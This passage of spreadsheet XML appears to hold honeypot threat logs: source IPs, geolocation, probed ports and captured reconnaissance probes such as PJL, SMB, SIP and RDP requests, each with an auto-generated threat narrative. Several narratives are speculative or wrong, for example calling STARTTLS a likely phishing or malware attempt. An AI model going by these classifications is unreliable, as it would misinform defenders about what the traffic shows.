    <s v="&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_SMB_H4&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_FTP_H19&amp;&amp;SMA-LAB_FTP_H22&amp;&amp;SMA-LAB_LDAP_H21&amp;&amp;SMA-LAB_MYSQL_H16&amp;&amp;SMA-LAB_IMAP_H29&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_POP3_H41"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;143&amp;&amp;9100&amp;&amp;445&amp;&amp;23&amp;&amp;443&amp;&amp;21&amp;&amp;389&amp;&amp;3306&amp;&amp;110&amp;&amp;3389&amp;&amp;NA&amp;&amp;25&amp;&amp;1433&amp;&amp;5432"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="9465"/>
    <s v="AGOTOZ PTE. LTD."/>
    <s v="Agotoz HK Limited"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="command&amp;&amp;connection&amp;&amp;NA&amp;&amp;login&amp;&amp;query&amp;&amp;request&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '38.60.171.39:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.134,43520)}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 5.182.38.84:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.134,58136)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (gMcMsfgj,)}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.134;rport=51720'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.134,50270)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (sYkYVDUB,)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'User-Agent': 'NTRIP GNSSInternetRadio', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '95.164.21.98:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 38.60.209.6:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 209.145.61.177:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.134,48866)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (cvYrlrUH,)}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.134;rport=56000'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '193.57.138.110:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 154.26.156.60:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9ad4:8d86"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;Medium"/>
    <s v="No data provided to analyze. &amp;&amp; No POP3 connection established, possibly an attempt to scan or exploit service for unauthorized access. &amp;&amp; This data indicates an attempt to authenticate with NTLM credentials through the SMTP service. The authentication is being requested by the client and the server is responding. It suggests a potential brute force login or password cracking attempt. &amp;&amp; An attacker is attempting to establish a secure connection using the STARTTLS command, possibly to mask malicious activity. This could be an attempt to inject malware or steal sensitive information. It may also indicate a phishing attack or other type of email-based scam."/>
    <s v="Password cracking &amp;&amp; SMTP Attack"/>
  </r>
  <r>
    <x v="344"/>
    <x v="344"/>
    <s v="72-48-22-88.dyn.grandenetworks.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T21:10:13"/>
    <d v="2025-02-22T06:10:30"/>
    <d v="2025-04-29T21:10:13"/>
    <n v="276"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="23&amp;&amp;44565&amp;&amp;44792&amp;&amp;44587&amp;&amp;43478&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="TX"/>
    <s v="Texas"/>
    <s v="Denton"/>
    <s v="Double Oak"/>
    <s v="4686709"/>
    <s v="NA"/>
    <s v="33.0651"/>
    <s v="-97.1106"/>
    <s v="7459"/>
    <s v="Grande Communications Networks, LLC"/>
    <s v="Grande Communications Networks"/>
    <s v="business"/>
    <s v="Grande Communications FRISCO PARKER SQUARE"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4830:1658"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="345"/>
    <x v="345"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T21:10:12"/>
    <d v="2023-08-08T10:35:00"/>
    <d v="2025-04-29T21:10:12"/>
    <n v="653"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H3&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H10"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Thāne"/>
    <s v="1254661"/>
    <s v="400601"/>
    <s v="19.2183"/>
    <s v="72.9781"/>
    <s v="141148"/>
    <s v="MyBharat Net Private Limited"/>
    <s v="MyBharat Net Private Limited"/>
    <s v="business"/>
    <s v="IntechDC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,19673)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,19708)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,60370)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,4283)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,37513)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,37573)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,26596)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,26644)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,49140)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,49196)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,14536)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,14630)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,51442)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,51547)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,38953)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,39035)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,29874)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,29951)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,3996)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,4053)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.61.72.205,51835)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9a3d:48cd"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No log data provided, cannot analyze or describe any possible malicious activity. &amp;&amp; No log data provided, cannot determine malicious activity. &amp;&amp; An incoming connection from an unknown IP address to SMB service has been detected. This could be a sign of potential unauthorized access or file sharing attempts. It may also indicate a malicious scan for vulnerabilities. &amp;&amp; An incoming SMB connection from IP address 154.61.72.205 with port 51835 suggests potential malicious activity such as a brute force attack or unauthorized access attempt to shared resources. This could be an indication of malware spreading or data exfiltration. The unusual port and source IP may indicate a spoofed or compromised host. &amp;&amp; No log data provided, unable to analyze or comment on possible malicious activity. &amp;&amp; Possible attempt to access Microsoft SQL Server database without proper authentication credentials. This could be a brute-force login or unauthorized access attempt. Indicates potential security breach."/>
    <s v="SQL Attack"/>
  </r>
  <r>
    <x v="346"/>
    <x v="346"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T21:09:29"/>
    <d v="2025-03-13T15:23:02"/>
    <d v="2025-04-29T21:09:29"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Yeoncheon-gun"/>
    <s v="Yeoncheon-gun (Jangnam-myeon)"/>
    <s v="1832697"/>
    <s v="NA"/>
    <s v="37.981700000000004"/>
    <s v="126.884"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dd97:d119"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <s v="No suspicious TELNET activity detected as of now, but it does not rule out future malicious attempts."/>
    <s v="Portscan"/>
  </r>
  <r>
    <x v="347"/>
    <x v="347"/>
    <s v="u157-119.static.kabel1.cz&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T21:08:30"/>
    <d v="2025-04-29T21:01:46"/>
    <d v="2025-04-29T21:08:30"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_HTTPS_HC1"/>
    <s v="8443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="CZ"/>
    <s v="Czechia"/>
    <s v="42"/>
    <s v="Ústecký kraj"/>
    <s v="Chomutov District"/>
    <s v="Chomutov"/>
    <s v="3077685"/>
    <s v="430 01"/>
    <s v="50.4583"/>
    <s v="13.3974"/>
    <s v="47232"/>
    <s v="ISP Alliance a.s."/>
    <s v="GRAPESC I"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET"/>
    <s v="{Data_HTTPS:{'Accept': 'text/plain,text/html', 'Host': '103.211.202.140', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5d5b:9d77"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="A GET request is being made to the root directory of a server from an IP address, possibly indicating reconnaissance or information gathering by an unknown entity. The request includes an Accept header that allows for plain text and HTML responses. This could be a probe to identify vulnerable services. &amp;&amp; Possible malicious activity is a GET request from an unknown IP address (103.211.202.140) to the root directory of a service, possibly attempting to identify or exploit vulnerabilities on the system. The request includes a specific Accept header that may indicate further malicious intent. The request appears to be coming from an external source."/>
    <s v="PortScan"/>
  </r>
  <r>
    <x v="348"/>
    <x v="348"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T20:46:43"/>
    <d v="2024-04-15T14:03:46"/>
    <d v="2025-04-29T20:46:43"/>
    <n v="133"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_FTP_H22&amp;&amp;SMA-LAB_POP3_H2&amp;&amp;SMA-LAB_MYSQL_H19&amp;&amp;SMA-LAB_FTP_H7&amp;&amp;SMA-LAB_SNMP_H44&amp;&amp;SMA-LAB_IMAP_H19&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_PJL_H7&amp;&amp;SMA-LAB_FTP_H40&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_LDAP_H14&amp;&amp;SMA-LAB_RDP_H44&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_MSSQL_H15&amp;&amp;SMA-LAB_SOCKS5_H39&amp;&amp;SMA-LAB_SOCKS5_H28&amp;&amp;SMA-LAB_SOCKS5_H27&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_SNMP_H14&amp;&amp;SMA-LAB_SNMP_H35&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_NTP_H38&amp;&amp;SMA-LAB_ORACLE_H13&amp;&amp;SMA-LAB_POSTGRES_H47&amp;&amp;SMA-LAB_POSTGRES_H39&amp;&amp;SMA-LAB_PJL_H15&amp;&amp;SMA-LAB_FTP_H21&amp;&amp;SMA-LAB_POSTGRES_H28&amp;&amp;SMA-LAB_MYSQL_H29&amp;&amp;SMA-LAB_RDP_H33&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_IRC_H32&amp;&amp;SMA-LAB_POSTGRES_H31&amp;&amp;SMA-LAB_POP3_H23&amp;&amp;SMA-LAB_IMAP_H37&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_SOCKS5_H16&amp;&amp;SMA-LAB_SOCKS5_H12&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_SOCKS5_H23"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;3389&amp;&amp;21&amp;&amp;110&amp;&amp;3306&amp;&amp;161&amp;&amp;143&amp;&amp;9100&amp;&amp;1433&amp;&amp;22890&amp;&amp;5900&amp;&amp;1080&amp;&amp;54292&amp;&amp;NA&amp;&amp;1521&amp;&amp;5432&amp;&amp;6667&amp;&amp;54889&amp;&amp;23&amp;&amp;59274&amp;&amp;50323&amp;&amp;52307&amp;&amp;389&amp;&amp;80&amp;&amp;6379&amp;&amp;56179&amp;&amp;53009&amp;&amp;63316&amp;&amp;57164"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits']}"/>
    <n v="63"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2021-12-20"/>
    <s v="PAN-22"/>
    <s v="2021-12-20"/>
    <s v="connection&amp;&amp;query&amp;&amp;NA&amp;&amp;stshash&amp;&amp;request&amp;&amp;GET&amp;&amp;command"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=NmXnNq'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=yVhmufpPW'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=kLJcuV'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c6eb:1889"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="A possible malicious activity is an attempt to extract printer information or gain unauthorized access to a device's configuration settings._x000a_The attacker may be trying to exploit a vulnerability in the print job processing system._x000a_This could potentially lead to further exploitation or data theft. &amp;&amp; This log indicates an attempt to retrieve printer information, which could be a reconnaissance activity by an attacker to gather knowledge about the system's configuration and potential vulnerabilities. The command is likely part of a larger attack sequence. It suggests someone trying to map out what services are available on the system. &amp;&amp; Possible printer exploitation attempt where an attacker sends a malicious print job command to gain unauthorized access or control of the device's settings and operations. The attack may be used for espionage, sabotage, or to create a network entry point. Malicious actors can use this technique to spread malware or steal sensitive information. &amp;&amp; The data suggests an attempt to retrieve printer configuration information, likely for malicious purposes such as exploiting vulnerabilities or stealing sensitive data. This activity appears to be a probing operation, attempting to gather information about the system's printer settings. The goal is probably to gain unauthorized access or exploit printer-specific vulnerabilities. &amp;&amp; Malicious actor attempting to enable TLS encryption for FTP connection, possibly to mask subsequent unauthorized access or data transfer. This could be a step towards compromising the system's security. Further analysis is needed to determine the full extent of the malicious activity. &amp;&amp; An attacker is attempting to use TLS encryption for FTP login, which could be an attempt to conceal malicious activity or evade detection. This may indicate a potential vulnerability exploitation or unauthorized access attempt. The user is trying to establish an encrypted connection for the authentication process."/>
    <s v="Invalid IMAP &amp;&amp; Printer Hack &amp;&amp; Brute Scripting &amp;&amp; Weak TLS &amp;&amp; SSL Attack"/>
  </r>
  <r>
    <x v="349"/>
    <x v="349"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T20:43:18"/>
    <d v="2025-04-29T20:43:18"/>
    <d v="2025-04-29T20:43:18"/>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d:7303"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="350"/>
    <x v="350"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T20:40:18"/>
    <d v="2024-04-02T11:37:00"/>
    <d v="2025-04-29T20:40:18"/>
    <n v="193"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_MYSQL_H25&amp;&amp;SMA-LAB_FTP_H5&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_RDP_H41&amp;&amp;SMA-LAB_SNMP_H8&amp;&amp;SMA-LAB_VNC_H2&amp;&amp;SMA-LAB_SOCKS5_H29&amp;&amp;SMA-LAB_FTP_H47&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_PJL_H24&amp;&amp;SMA-LAB_PJL_H30&amp;&amp;SMA-LAB_ORACLE_H10&amp;&amp;SMA-LAB_FTP_H31&amp;&amp;SMA-LAB_SOCKS5_H33&amp;&amp;SMA-LAB_SOCKS5_H25&amp;&amp;SMA-LAB_SOCKS5_H14&amp;&amp;SMA-LAB_MYSQL_H28&amp;&amp;SMA-LAB_PJL_H47&amp;&amp;SMA-LAB_PJL_H28&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_SOCKS5_H47&amp;&amp;SMA-LAB_SOCKS5_H40&amp;&amp;SMA-LAB_FTP_H27&amp;&amp;SMA-LAB_FTP_H10&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_RDP_H26&amp;&amp;SMA-LAB_LDAP_H46&amp;&amp;SMA-LAB_REDIS_H23&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_PJL_H17&amp;&amp;SMA-LAB_SNMP_H3&amp;&amp;SMA-LAB_SNMP_H33&amp;&amp;SMA-LAB_POP3_H37&amp;&amp;SMA-LAB_SNMP_H47&amp;&amp;SMA-LAB_RDP_H21&amp;&amp;SMA-LAB_SNMP_H6"/>
